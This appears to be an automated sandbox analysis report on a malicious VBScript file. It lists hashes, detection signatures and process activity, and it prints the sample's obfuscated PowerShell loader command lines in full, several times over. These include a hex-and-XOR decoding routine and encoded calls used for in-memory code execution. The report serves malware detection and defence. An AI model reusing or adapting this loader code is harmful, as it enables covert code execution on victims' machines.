Windows Analysis Report
204789503327.vbs

Overview

General Information

Sample Name: 204789503327.vbs
Analysis ID: 757929
MD5: ab08b82ba491ab021bd79e4b3063c8e7
SHA1: 842a38cb3431d39dfac4cf29fb050762a228ad95
SHA256: 9f8413bd5c69b09a641b24416a53c2345604459094b025b1faa06db9b2ceb1ae
Tags: vbs
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Enables debug privileges

Classification

Source: powershell.exe, 00000003.00000002.826224544.000001D963DBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.826872111.000001D963F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P Jump to behavior
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22574
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5571
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22574 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5571 Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: 204789503327.vbs Initial sample: Strings found which are bigger than 50
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF9A5CF0CA8 3_2_00007FF9A5CF0CA8
Abnormal high CPU Usage
Source: C:\Windows\System32\wscript.exe Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\204789503327.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$campemen); $Larde = New-Object byte[] ($campemen.Length / 2); For($Turl=0; $Turl -lt $campemen.Length; $Turl+=2){ $Larde[$Turl/2] = [convert]::ToByte($campemen.Substring($Turl, 2), 16); $Larde[$Turl/2] = ($Larde[$Turl/2] -bxor 89); } [String][System.Text.Encoding]::ASCII.GetString($Larde);}$anton0=HTB '0A202A2D3C34773D3535';$anton1=HTB '14303A2B362A363F2D770E30376A6B770C372A383F3C17382D302F3C143C2D31363D2A';$anton2=HTB '1E3C2D092B363A183D3D2B3C2A2A';$anton3=HTB '0A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F';$anton4=HTB '2A2D2B30373E';$anton5=HTB '1E3C2D14363D2C353C1138373D353C';$anton6=HTB '0B0D0A293C3A3038351738343C757911303D3C1B200A303E7579092C3B35303A';$anton7=HTB '0B2C372D30343C7579143837383E3C3D';$anton8=HTB '0B3C3F353C3A2D3C3D1D3C353C3E382D3C';$anton9=HTB '1037143C34362B2014363D2C353C';$Unitedn0=HTB '14201D3C353C3E382D3C0D20293C';$Unitedn1=HTB '1A35382A2A7579092C3B35303A75790A3C38353C3D757918372A301A35382A2A7579182C2D361A35382A2A';$Unitedn2=HTB '10372F36323C';$Unitedn3=HTB '092C3B35303A757911303D3C1B200A303E7579173C2E0A35362D75790F302B2D2C3835';$Unitedn4=HTB '0F302B2D2C3835183535363A';$Unitedn5=HTB '372D3D3535';$Unitedn6=HTB '172D092B362D3C3A2D0F302B2D2C3835143C34362B20';$Unitedn7=HTB '101C01';$Unitedn8=HTB '05';function fkp {Param ($Patro40, $Selvf) ;$Cont0 =HTB '7D1D303A2D382D3679647971021829291D36343830370463631A2C2B2B3C372D1D3634383037771E3C2D182A2A3C343B35303C2A71707925790E313C2B3C74163B333C3A2D7922797D06771E35363B3835182A2A3C343B35201A383A313C797418373D797D067715363A382D303637770A2935302D717D0C37302D3C3D37617002746804771C282C38352A717D38372D36376970792470771E3C2D0D20293C717D38372D36376870';&($Unitedn7) $Cont0;$Cont5 = HTB '7D1B2B3C3D3D7964797D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376B7579020D20293C0204047919717D38372D36376A75797D38372D36376D7070';&($Unitedn7) $Cont5;$Cont1 = HTB '2B3C2D2C2B37797D1B2B3C3D3D7710372F36323C717D372C353575791971020A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F0471173C2E74163B333C3A2D790A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F7171173C2E74163B333C3A2D7910372D092D2B707579717D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376C70707710372F36323C717D372C3535757919717D09382D2B366D697070707075797D0A3C352F3F7070';&($Unitedn7) $Cont1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Knsski,[Parameter(Position = 1)] [Type] $Semitiskeo = [Void]);$Cont2 = HTB '7D0F363A382D3036796479021829291D36343830370463631A2C2B2B3C372D1D3634383037771D3C3F30373C1D20373834303A182A2A3C343B35207171173C2E74163B333C3A2D790A202A2D3C34770B3C3F353C3A2D30363777182A2A3C343B35201738343C717D38372D36376170707579020A202A2D3C34770B3C3F353C3A2D303637771C34302D77182A2A3C343B35201B2C30353D3C2B183A3A3C2A2A0463630B2C3770771D3C3F30373C1D2037383430
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$campemen); $Larde = New-Object byte[] ($campemen.Length / 2); For($Turl=0; $Turl -lt $campemen.Length; $Turl+=2){ $Larde[$Turl/2] = [convert]::ToByte($campemen.Substring($Turl, 2), 16); $Larde[$Turl/2] = ($Larde[$Turl/2] -bxor 89); } [String][System.Text.Encoding]::ASCII.GetString($Larde);}$anton0=HTB '0A202A2D3C34773D3535';$anton1=HTB '14303A2B362A363F2D770E30376A6B770C372A383F3C17382D302F3C143C2D31363D2A';$anton2=HTB '1E3C2D092B363A183D3D2B3C2A2A';$anton3=HTB '0A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F';$anton4=HTB '2A2D2B30373E';$anton5=HTB '1E3C2D14363D2C353C1138373D353C';$anton6=HTB '0B0D0A293C3A3038351738343C757911303D3C1B200A303E7579092C3B35303A';$anton7=HTB '0B2C372D30343C7579143837383E3C3D';$anton8=HTB '0B3C3F353C3A2D3C3D1D3C353C3E382D3C';$anton9=HTB '1037143C34362B2014363D2C353C';$Unitedn0=HTB '14201D3C353C3E382D3C0D20293C';$Unitedn1=HTB '1A35382A2A7579092C3B35303A75790A3C38353C3D757918372A301A35382A2A7579182C2D361A35382A2A';$Unitedn2=HTB '10372F36323C';$Unitedn3=HTB '092C3B35303A757911303D3C1B200A303E7579173C2E0A35362D75790F302B2D2C3835';$Unitedn4=HTB '0F302B2D2C3835183535363A';$Unitedn5=HTB '372D3D3535';$Unitedn6=HTB '172D092B362D3C3A2D0F302B2D2C3835143C34362B20';$Unitedn7=HTB '101C01';$Unitedn8=HTB '05';function fkp {Param ($Patro40, $Selvf) ;$Cont0 =HTB '7D1D303A2D382D3679647971021829291D36343830370463631A2C2B2B3C372D1D3634383037771E3C2D182A2A3C343B35303C2A71707925790E313C2B3C74163B333C3A2D7922797D06771E35363B3835182A2A3C343B35201A383A313C797418373D797D067715363A382D303637770A2935302D717D0C37302D3C3D37617002746804771C282C38352A717D38372D36376970792470771E3C2D0D20293C717D38372D36376870';&($Unitedn7) $Cont0;$Cont5 = HTB '7D1B2B3C3D3D7964797D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376B7579020D20293C0204047919717D38372D36376A75797D38372D36376D7070';&($Unitedn7) $Cont5;$Cont1 = HTB '2B3C2D2C2B37797D1B2B3C3D3D7710372F36323C717D372C353575791971020A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F0471173C2E74163B333C3A2D790A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F7171173C2E74163B333C3A2D7910372D092D2B707579717D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376C70707710372F36323C717D372C3535757919717D09382D2B366D697070707075797D0A3C352F3F7070';&($Unitedn7) $Cont1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Knsski,[Parameter(Position = 1)] [Type] $Semitiskeo = [Void]);$Cont2 = HTB '7D0F363A382D3036796479021829291D36343830370463631A2C2B2B3C372D1D3634383037771D3C3F30373C1D20373834303A182A2A3C343B35207171173C2E74163B333C3A2D790A202A2D3C34770B3C3F353C3A2D30363777182A2A3C343B35201738343C717D38372D36376170707579020A202A2D3C34770B3C3F353C3A2D303637771C34302D77182A2A3C343B35201B2C30353D3C2B183A3A3C2A2A0463630B2C3770771D3C3F30373C1D2037383430 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\204789503327.vbs"
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Spor.dat Jump to behavior
